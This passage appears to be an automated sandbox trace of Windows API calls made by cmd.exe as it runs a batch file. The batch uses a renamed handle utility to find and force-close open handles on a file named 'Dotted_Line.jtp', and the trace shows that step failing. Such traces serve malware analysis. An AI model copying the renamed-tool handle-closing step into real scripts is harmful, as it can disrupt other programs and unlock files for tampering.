returned 1 [0234.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.075] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.075] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.075] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0234.076] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.076] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0234.076] SetConsoleInputExeNameW () returned 0x1 [0234.076] GetConsoleOutputCP () returned 0x1b5 [0234.077] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0234.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0234.078] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0234.078] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.078] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474350 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4742e0 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474270 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474200 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460db8 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4741a0 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461248 | out: hHeap=0x460000) returned 1 [0234.078] GetProcessHeap () returned 0x460000 [0234.078] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4611d0 | out: hHeap=0x460000) returned 1 [0234.078] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.078] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0234.078] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df0e8*=0x94, lpOverlapped=0x0) returned 1 [0234.078] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0234.079] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.079] GetFileType (hFile=0x78) returned 0x1 [0234.079] _get_osfhandle (_FileHandle=3) returned 0x78 [0234.079] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0234.079] GetProcessHeap () returned 0x460000 [0234.079] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x484bc8 [0234.079] GetProcessHeap () returned 0x460000 [0234.079] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4008) returned 0x488be0 [0234.080] GetProcessHeap () returned 0x460000 [0234.080] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x460db8 [0234.080] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"Dotted_Line.jtp\"") returned 0x11 [0234.080] GetProcessHeap () returned 0x460000 [0234.080] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460db8 | out: hHeap=0x460000) returned 1 [0234.080] GetProcessHeap () returned 0x460000 [0234.081] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x488be0 | out: hHeap=0x460000) returned 1 [0234.081] GetProcessHeap () returned 0x460000 [0234.081] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x484bc8 | out: hHeap=0x460000) returned 1 [0234.088] _tell (_FileHandle=3) returned 226 [0234.088] _close (_FileHandle=3) returned 0 [0234.088] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3deebc | out: _Buffer="\r\n") returned 2 [0234.088] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.088] GetFileType (hFile=0x7) returned 0x2 [0234.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.088] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee7c | out: lpMode=0x3dee7c) returned 1 [0234.089] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deea8*=0x2) returned 1 [0234.090] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0234.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0234.091] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3deeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0234.091] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3deeb8 | out: _Buffer=">") returned 1 [0234.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.091] GetFileType (hFile=0x7) returned 0x2 [0234.091] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.091] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dee80 | out: lpMode=0x3dee80) returned 1 [0234.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.092] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3deeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3deeac*=0x26) returned 1 [0234.093] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x3df13c | out: _Buffer="FOR") returned 3 [0234.093] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.093] GetFileType (hFile=0x7) returned 0x2 [0234.093] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.093] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.093] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.093] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x3) returned 1 [0234.094] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3df13c | out: _Buffer=" /F") returned 3 [0234.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.094] GetFileType (hFile=0x7) returned 0x2 [0234.094] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.094] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.095] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x3) returned 1 [0234.095] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3df13c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0234.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.095] GetFileType (hFile=0x7) returned 0x2 [0234.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x20) returned 1 [0234.096] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3df13c | out: _Buffer=" %I IN ") returned 7 [0234.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.096] GetFileType (hFile=0x7) returned 0x2 [0234.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.097] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x7) returned 1 [0234.098] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x3df138 | out: _Buffer="(`tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner`) DO ") returned 60 [0234.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.098] GetFileType (hFile=0x7) returned 0x2 [0234.099] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0f8 | out: lpMode=0x3df0f8) returned 1 [0234.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x3df124, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df124*=0x3c) returned 1 [0234.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.100] GetFileType (hFile=0x7) returned 0x2 [0234.100] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.100] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df104 | out: lpMode=0x3df104) returned 1 [0234.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3df130, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x3df130*=0x1) returned 1 [0234.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.101] GetFileType (hFile=0x7) returned 0x2 [0234.101] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.101] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0e8 | out: lpMode=0x3df0e8) returned 1 [0234.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x474340*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3df114, lpReserved=0x0 | out: lpBuffer=0x474340*, lpNumberOfCharsWritten=0x3df114*=0xc) returned 1 [0234.372] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df120 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0234.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.372] GetFileType (hFile=0x7) returned 0x2 [0234.373] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.373] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0e0 | out: lpMode=0x3df0e0) returned 1 [0234.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.373] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df10c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df10c*=0x26) returned 1 [0234.375] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df13c | out: _Buffer=") ") returned 2 [0234.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.375] GetFileType (hFile=0x7) returned 0x2 [0234.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.376] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0fc | out: lpMode=0x3df0fc) returned 1 [0234.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.376] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df128*=0x2) returned 1 [0234.377] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df15c | out: _Buffer="\r\n") returned 2 [0234.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.377] GetFileType (hFile=0x7) returned 0x2 [0234.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.377] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df11c | out: lpMode=0x3df11c) returned 1 [0234.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.378] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df148*=0x2) returned 1 [0234.380] GetProcessHeap () returned 0x460000 [0234.380] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2c) returned 0x4743c8 [0234.380] GetProcessHeap () returned 0x460000 [0234.380] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xc) returned 0x460db8 [0234.380] GetProcessHeap () returned 0x460000 [0234.380] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xc) returned 0x460dd0 [0234.380] GetProcessHeap () returned 0x460000 [0234.380] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x460de8 [0234.380] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0234.380] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0234.380] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0234.380] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0234.380] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0234.380] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0234.380] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0234.380] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x3df078, _Radix=0 | out: _EndPtr=0x3df078*=",6 delims=: \"") returned 3 [0234.380] wcstol (in: _String="6 delims=: \"", _EndPtr=0x3df078, _Radix=0 | out: _EndPtr=0x3df078*=" delims=: \"") returned 6 [0234.380] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0234.380] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0234.380] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0234.380] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0234.380] GetProcessHeap () returned 0x460000 [0234.380] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x460de8 | out: hHeap=0x460000) returned 1 [0234.381] GetProcessHeap () returned 0x460000 [0234.381] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x460de8 [0234.381] GetProcessHeap () returned 0x460000 [0234.381] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x460db8, Size=0xe) returned 0x460e00 [0234.381] GetProcessHeap () returned 0x460000 [0234.381] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x460e00) returned 0xe [0234.381] GetProcessHeap () returned 0x460000 [0234.381] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x460dd0, Size=0x14) returned 0x4612a0 [0234.381] GetProcessHeap () returned 0x460000 [0234.381] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4612a0) returned 0x14 [0234.381] _wpopen (_Command="tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner", _Mode="rb") returned 0x77032960 [0234.398] feof (_File=0x77032960) returned 0 [0234.398] ferror (_File=0x77032960) returned 0 [0234.398] GetProcessHeap () returned 0x460000 [0234.398] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x108) returned 0x474400 [0234.398] fgets (in: _Buf=0x474408, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0239.674] feof (_File=0x77032960) returned 0 [0239.674] ferror (_File=0x77032960) returned 0 [0239.674] GetProcessHeap () returned 0x460000 [0239.674] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474400, Size=0x208) returned 0x474400 [0239.674] GetProcessHeap () returned 0x460000 [0239.674] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474400) returned 0x208 [0239.674] fgets (in: _Buf=0x47444e, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0239.674] feof (_File=0x77032960) returned 0 [0239.674] ferror (_File=0x77032960) returned 0 [0239.674] GetProcessHeap () returned 0x460000 [0239.674] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474400, Size=0x308) returned 0x474400 [0239.674] GetProcessHeap () returned 0x460000 [0239.674] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474400) returned 0x308 [0239.674] fgets (in: _Buf=0x474451, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0240.199] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0240.200] GetProcessHeap () returned 0x460000 [0240.200] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474400, Size=0x9e) returned 0x474400 [0240.200] GetProcessHeap () returned 0x460000 [0240.200] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474400) returned 0x9e [0240.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x474451, cbMultiByte=73, lpWideCharStr=0x474408, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0240.201] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ded6c | out: _Buffer="\r\n") returned 2 [0240.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.202] GetFileType (hFile=0x7) returned 0x2 [0240.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.203] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ded2c | out: lpMode=0x3ded2c) returned 1 [0240.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.203] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ded58, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3ded58*=0x2) returned 1 [0240.205] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0240.205] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3ded68 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0240.205] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3ded68 | out: _Buffer=">") returned 1 [0240.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.205] GetFileType (hFile=0x7) returned 0x2 [0240.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.205] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ded30 | out: lpMode=0x3ded30) returned 1 [0240.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.206] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3ded5c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3ded5c*=0x26) returned 1 [0240.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.206] GetFileType (hFile=0x7) returned 0x2 [0240.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3defb4 | out: lpMode=0x3defb4) returned 1 [0240.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.207] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3defe0, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x3defe0*=0x1) returned 1 [0240.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.207] GetFileType (hFile=0x7) returned 0x2 [0240.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.208] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3def98 | out: lpMode=0x3def98) returned 1 [0240.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.208] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x484bd0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3defc4, lpReserved=0x0 | out: lpBuffer=0x484bd0*, lpNumberOfCharsWritten=0x3defc4*=0xc) returned 1 [0240.209] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3defd0 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0240.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.209] GetFileType (hFile=0x7) returned 0x2 [0240.209] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.209] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3def90 | out: lpMode=0x3def90) returned 1 [0240.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.210] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x3defbc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3defbc*=0x2c) returned 1 [0240.212] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3defec | out: _Buffer=") ") returned 2 [0240.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.212] GetFileType (hFile=0x7) returned 0x2 [0240.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.212] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3defac | out: lpMode=0x3defac) returned 1 [0240.212] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.213] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3defd8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3defd8*=0x2) returned 1 [0240.213] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df00c | out: _Buffer="\r\n") returned 2 [0240.213] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.213] GetFileType (hFile=0x7) returned 0x2 [0240.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0240.214] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3defcc | out: lpMode=0x3defcc) returned 1 [0240.214] _get_osfhandle (_FileHandle=1) returned 0x7 [0240.214] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3deff8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3deff8*=0x2) returned 1 [0240.216] GetConsoleTitleW (in: lpConsoleTitle=0x3deb1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0240.217] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474750, lpFilePart=0x3de63c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3de63c*="Desktop") returned 0x25 [0240.217] SetErrorMode (uMode=0x0) returned 0x1 [0240.217] GetProcessHeap () returned 0x460000 [0240.217] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474748, Size=0x6e) returned 0x474748 [0240.217] GetProcessHeap () returned 0x460000 [0240.218] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474748) returned 0x6e [0240.218] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0240.218] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0240.218] GetProcessHeap () returned 0x460000 [0240.218] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x4747c0 [0240.218] GetProcessHeap () returned 0x460000 [0240.218] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4748e8 [0240.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0240.218] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x3de3d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de3d8) returned 0x474a98 [0240.219] FindClose (in: hFindFile=0x474a98 | out: hFindFile=0x474a98) returned 1 [0240.219] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0240.219] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0240.219] GetConsoleTitleW (in: lpConsoleTitle=0x3de8b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0240.219] InitializeProcThreadAttributeList (in: lpAttributeList=0x3de738, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3de800 | out: lpAttributeList=0x3de738, lpSize=0x3de800) returned 1 [0240.219] UpdateProcThreadAttribute (in: lpAttributeList=0x3de738, dwFlags=0x0, Attribute=0x60001, lpValue=0x3de7f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3de738, lpPreviousValue=0x0) returned 1 